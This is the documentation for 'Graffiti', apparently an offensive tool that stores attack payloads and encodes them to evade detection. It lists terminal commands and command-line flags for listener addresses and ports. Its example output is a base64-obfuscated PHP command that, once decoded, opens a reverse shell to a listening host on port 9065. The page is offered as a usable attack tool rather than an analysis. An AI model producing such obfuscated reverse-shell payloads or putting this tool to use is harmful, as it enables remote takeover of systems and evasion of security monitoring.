    Graffiti comes with a builtin terminal, when you pass no flags to the program it will drop into the terminal. The terminal has history, the ability to run external commands, and it's own internal commands. In order to get help, you jsut have to type help or ?:
      ________              _____  _____.__  __  .__ 
    / _____/___________ _/ ____\/ ____\__|/ |_|__|
    / \ __\_ __ \__ \\ __\\ __\| \ __\ |
    \ \_\ \ | \// __ \| | | | | || | | |
    \______ /__| (____ /__| |__| |__||__| |__|
    \/ \/
    v(0.1)

    no arguments have been passed, dropping into terminal type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal
    root@graffiti:~/graffiti# ?

    Command Description
    --------- --------------
    help/? Show this help
    external List available external commands
    cached Display all payloads that are already in the database
    list/show List all available payloads
    search <phrase> Search for a specific payload
    use <payload> <coder> Use this payload and encode it using a specified coder
    info <payload> Get information on a specified payload
    check Check for updates
    history Display command history
    exit/quit Exit the terminal and running session
    encode <script-type> <coder> Encode a provided payload

    root@graffiti:~/graffiti# help

    Command Description
    --------- --------------
    help/? Show this help
    external List available external commands
    cached Display all payloads that are already in the database
    list/show List all available payloads
    search <phrase> Search for a specific payload
    use <payload> <coder> Use this payload and encode it using a specified coder
    info <payload> Get information on a specified payload
    check Check for updates
    history Display command history
    exit/quit Exit the terminal and running session
    encode <script-type> <coder> Encode a provided payload
    Graffiti also comes with command line arguments for when you need a payload encoded quickly:
    usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
    [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
    [-l]
    [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
    [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC]
    [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]

    optional arguments:
    -h, --help show this help message and exit
    -c CODEC, --codec CODEC
    specify an encoding technique (*default=None)
    -p PAYLOAD, --payload PAYLOAD
    pass the path to a payload to use (*default=None)
    --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
    create a payload file and store it inside of
    ./etc/payloads (*default=None)
    -l, --list list all available payloads by path (*default=False)
    -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
    pass your own personal payload to use for the encoding
    (*default=None)
    -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
    pass a listening address to use for the payload (if
    needed) (*default=None)
    -lP LISTENING-PORT, --lport LISTENING-PORT
    pass a listening port to use for the payload (if
    needed) (*default=None)
    -u URL, --url URL pass a URL if needed by your payload (*default=None)
    -vC, --view-cached view the cached data already present inside of the
    database
    -H, --no-history do not store the command history (*default=True)
    -W, --wipe wipe the database and the history (*default=False)
    --memory initialize the database into memory instead of a .db
    file (*default=False)
    -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
    pass more external commands, this will allow them to
    be accessed inside of the terminal commands must be in
    your PATH (*default=None)
    Encoding a payload is simple as this:
    root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
    Encoded Payload:
    --------------------------------------------------

    php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'

    --------------------------------------------------

    A demo of Graffiti can be found here:


    Installation
    On any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable onto your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following:
    ./install.sh
    This will install Graffiti into your system and allow you to run it from anywhere.

    Bugs and issues
    If you happen to find a bug or an issue, please create an issue with details here and thank you ahead of time!


    Viewing all 5838 articles
    Browse latest View live


    <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>